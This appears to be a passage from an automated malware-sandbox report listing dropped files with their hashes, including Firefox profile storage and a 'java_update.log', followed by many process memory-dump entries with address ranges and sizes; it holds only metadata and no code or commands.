ccdb224f1221f02846de4d4ec104263c8b0673886482889fd9f9b3b6956cad85

SHA512
fa87b0c3031a09aaabe9b18cccb1c513c9115131bdb6cb3a708815a8efd1d81ae669c4e1c3da1e0ffc43bcd87ebbde982f72405b769ddc43f52fcc1cdd98d060

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
3.4MB

MD5
91672df017d90a114fc657c5821df0a5

SHA1
fd2353e821f8adf0e30629e4155290f01bb8d716

SHA256
77b32dce5815b8c0e4d3506a2dbf633f790bad8eeeaeaa6a4b079a15bf0ac0ee

SHA512
eabfd93697a06c582e80b94ac51ef26bb48ea388cdb81087aa4a8ac86d672daca0583bcb47ad386ebbac09a0578beb9ffa2e78eb4f937e0741b29020fb2e2d98

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal

Filesize
64KB

MD5
3418dce6df467ffedc70d5a252e67311

SHA1
6c11daabeb2a14f95283b85e12f6d5c18962dfc6

SHA256
ef601153be8872e0e4d4fe375b7da74e35f1af0b5c97722e86e0e71d29153560

SHA512
e32582edadd69db98a0260ffcc861a4b3d50deabbc0aa1d0fb1b9d4b9ab96305a749b72d0a90f0569cbcebd0a536d0e92e11e8b4096357bab90807b55b4d01db

Download Submit
C:\Users\Admin\AppData\Roaming\Oracle\java_update.log

Filesize
4KB

MD5
a3cdc5a9a1357bd3ac3776f5e87b87f2

SHA1
f2430272ab4d735b939105ad8861c49fb2b83449

SHA256
8ed71a8d36b1c4af78ccf12e80cb10a8be8f78873f644c60c6360fbb6b9b390c

SHA512
ffa219a6d74a7f741b9f592e0e5ebcea42a0ead9a7944d8e4fdc4249a94bdb1fdf020f4ee03761cc29fa3c829e8d007e7081a99323fb2fc6bb32af221c4b3256

Download Submit
memory/408-79-0x00000000002D0000-0x0000000000776000-memory.dmp

Filesize
4.6MB

Download
memory/408-704-0x00000000002D0000-0x0000000000776000-memory.dmp

Filesize
4.6MB

Download
memory/408-80-0x00000000002D0000-0x0000000000776000-memory.dmp

Filesize
4.6MB

Download
memory/408-544-0x00000000002D0000-0x0000000000776000-memory.dmp

Filesize
4.6MB

Download
memory/408-48-0x00000000002D0000-0x0000000000776000-memory.dmp

Filesize
4.6MB

Download
memory/408-1037-0x00000000002D0000-0x0000000000776000-memory.dmp

Filesize
4.6MB

Download
memory/408-190-0x00000000002D0000-0x0000000000776000-memory.dmp

Filesize
4.6MB

Download
memory/1164-615-0x00000000002D0000-0x0000000000776000-memory.dmp

Filesize
4.6MB

Download
memory/1164-617-0x00000000002D0000-0x0000000000776000-memory.dmp

Filesize
4.6MB

Download
memory/1408-607-0x0000000005E50000-0x0000000005E9C000-memory.dmp

Filesize
304KB

Download
memory/1408-596-0x0000000005880000-0x0000000005BD4000-memory.dmp

Filesize
3.3MB

Download
memory/1596-95-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-1079-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-508-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-140-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-641-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-118-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-122-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-117-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-113-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-110-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-109-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-104-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-103-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-638-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-1087-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-1012-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-797-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-526-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-523-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-878-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-96-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-1067-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-507-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-530-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-1007-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-1010-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-1033-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-1015-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1596-156-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/1612-1014-0x0000000000B80000-0x000000000101F000-memory.dmp

Filesize
4.6MB

Download
memory/1612-721-0x0000000000B80000-0x000000000101F000-memory.dmp

Filesize
4.6MB

Download
memory/2068-593-0x0000000000300000-0x00000000007A6000-memory.dmp

Filesize
4.6MB

Download
memory/2068-576-0x0000000000300000-0x00000000007A6000-memory.dmp

Filesize
4.6MB

Download
memory/3016-1096-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/3016-1113-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/3224-1543-0x0000000000BA0000-0x000000000124A000-memory.dmp

Filesize
6.7MB

Download
memory/3224-1355-0x0000000000BA0000-0x000000000124A000-memory.dmp

Filesize
6.7MB

Download
memory/3648-1110-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/3712-1064-0x0000000000420000-0x0000000000728000-memory.dmp

Filesize
3.0MB

Download
memory/3712-1078-0x0000000000420000-0x0000000000728000-memory.dmp

Filesize
3.0MB

Download
memory/3952-1237-0x00000000726E0000-0x000000007272C000-memory.dmp

Filesize
304KB

Download
memory/4016-1870-0x000002A1EA520000-0x000002A1EA542000-memory.dmp

Filesize
136KB

Download
memory/4192-34-0x0000000000C30000-0x00000000010D6000-memory.dmp

Filesize
4.6MB

Download
memory/4192-47-0x0000000000C30000-0x00000000010D6000-memory.dmp

Filesize
4.6MB

Download
memory/4404-522-0x0000000006390000-0x00000000063DC000-memory.dmp

Filesize
304KB

Download
memory/4404-516-0x0000000005710000-0x0000000005A64000-memory.dmp

Filesize
3.3MB

Download
memory/4612-3-0x00000000057D0000-0x0000000005DF8000-memory.dmp

Filesize
6.2MB

Download
memory/4612-6-0x0000000005FE0000-0x0000000006046000-memory.dmp

Filesize
408KB

Download
memory/4612-19-0x0000000007F20000-0x000000000859A000-memory.dmp

Filesize
6.5MB

Download
memory/4612-20-0x0000000006B10000-0x0000000006B2A000-memory.dmp

Filesize
104KB

Download
memory/4612-24-0x0000000008B50000-0x00000000090F4000-memory.dmp

Filesize
5.6MB

Download
memory/4612-4-0x0000000005640000-0x0000000005662000-memory.dmp

Filesize
136KB

Download
memory/4612-18-0x0000000006630000-0x000000000667C000-memory.dmp

Filesize
304KB

Download
memory/4612-2-0x0000000005040000-0x0000000005076000-memory.dmp

Filesize
216KB

Download
memory/4612-16-0x0000000006150000-0x00000000064A4000-memory.dmp

Filesize
3.3MB

Download
memory/4612-22-0x0000000007B20000-0x0000000007BB6000-memory.dmp

Filesize
600KB

Download
memory/4612-5-0x0000000005F70000-0x0000000005FD6000-memory.dmp

Filesize
408KB

Download
memory/4612-17-0x00000000065E0000-0x00000000065FE000-memory.dmp

Filesize
120KB

Download
memory/4612-23-0x0000000007AB0000-0x0000000007AD2000-memory.dmp

Filesize
136KB

Download
memory/4644-1112-0x0000000000400000-0x000000000056C000-memory.dmp

Filesize
1.4MB

Download
memory/4716-1128-0x0000000000400000-0x000000000056C000-memory.dmp

Filesize
1.4MB

Download
memory/4988-1208-0x00000000064E0000-0x0000000006834000-memory.dmp

Filesize
3.3MB

Download
memory/4988-1209-0x0000000006A20000-0x0000000006A6C000-memory.dmp

Filesize
304KB

Download
memory/4988-1221-0x0000000007F50000-0x0000000007F61000-memory.dmp

Filesize
68KB

Download
memory/4988-1220-0x0000000007BF0000-0x0000000007C93000-memory.dmp

Filesize
652KB

Download
memory/4988-1210-0x000000006FAF0000-0x000000006FB3C000-memory.dmp

Filesize
304KB

Download
memory/5024-1145-0x0000000006440000-0x000000000648C000-memory.dmp

Filesize
304KB

Download
memory/5024-1157-0x0000000007570000-0x000000000758E000-memory.dmp

Filesize
120KB

Download
memory/5024-1135-0x0000000005DA0000-0x00000000060F4000-memory.dmp

Filesize
3.3MB

Download
memory/5024-1147-0x00000000726E0000-0x000000007272C000-memory.dmp

Filesize
304KB

Download
memory/5024-1160-0x0000000007960000-0x0000000007971000-memory.dmp

Filesize
68KB

Download
memory/5024-1159-0x00000000077D0000-0x00000000077DA000-memory.dmp

Filesize
40KB

Download
memory/5024-1146-0x0000000007590000-0x00000000075C2000-memory.dmp

Filesize
200KB

Download
memory/5024-1158-0x00000000075E0000-0x0000000007683000-memory.dmp

Filesize
652KB

Download
memory/5336-1978-0x0000000000430000-0x0000000000866000-memory.dmp

Filesize
4.2MB

Download
memory/5336-2574-0x0000000000430000-0x0000000000866000-memory.dmp

Filesize
4.2MB

Download
memory/5336-1979-0x0000000000430000-0x0000000000866000-memory.dmp

Filesize
4.2MB

Download
memory/5336-2503-0x0000000000430000-0x0000000000866000-memory.dmp

Filesize
4.2MB

Download
memory/5336-1955-0x0000000000430000-0x0000000000866000-memory.dmp

Filesize
4.2MB

Download
memory/5384-639-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/5384-640-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/5752-1051-0x0000000000470000-0x0000000000916000-memory.dmp

Filesize
4.6MB

Download
memory/5752-1046-0x0000000000470000-0x0000000000916000-memory.dmp

Filesize
4.6MB

Download
memory/5780-1034-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/5780-1035-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/5888-590-0x00000000059E0000-0x0000000005D34000-memory.dmp

Filesize
3.3MB

Download
memory/5972-1102-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/5972-1073-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/5972-763-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/5972-1065-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/5972-1066-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/5972-764-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/5972-1072-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/5972-1122-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/5972-1076-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/6888-2520-0x0000000000400000-0x0000000000DF1000-memory.dmp

Filesize
9.9MB

Download
memory/6888-2488-0x0000000000400000-0x0000000000DF1000-memory.dmp

Filesize
9.9MB

Download
memory/9400-2704-0x0000000000400000-0x0000000000CEA000-memory.dmp

Filesize
8.9MB

Download
memory/9400-2843-0x0000000000400000-0x0000000000CEA000-memory.dmp

Filesize
8.9MB

Download
memory/9400-2564-0x0000000000400000-0x0000000000CEA000-memory.dmp

Filesize
8.9MB

Download
memory/9584-2719-0x0000000000400000-0x0000000000CEA000-memory.dmp

Filesize
8.9MB

Download
memory/9584-2576-0x0000000000400000-0x0000000000CEA000-memory.dmp

Filesize
8.9MB

Download
memory/9584-2844-0x0000000000400000-0x0000000000CEA000-memory.dmp

Filesize
8.9MB

Download
memory/12932-2636-0x0000000000400000-0x0000000000DF1000-memory.dmp

Filesize
9.9MB

Download
memory/12932-2811-0x0000000000400000-0x0000000000DF1000-memory.dmp

Filesize
9.9MB

Download
memory/12932-3070-0x0000000000400000-0x0000000000DF1000-memory.dmp

Filesize
9.9MB

Download
memory/18124-3794-0x000002277B3C0000-0x000002277B3DC000-memory.dmp

Filesize
112KB

Download
memory/18124-3796-0x000002277B520000-0x000002277B52A000-memory.dmp

Filesize
40KB

Download
memory/18124-3797-0x000002277B530000-0x000002277B538000-memory.dmp

Filesize
32KB

Download
memory/18124-3798-0x000002277B540000-0x000002277B54A000-memory.dmp

Filesize
40KB

Download
memory/20940-2669-0x00000000002D0000-0x0000000000776000-memory.dmp

Filesize
4.6MB

Download
memory/20940-2656-0x00000000002D0000-0x0000000000776000-memory.dmp

Filesize
4.6MB

Download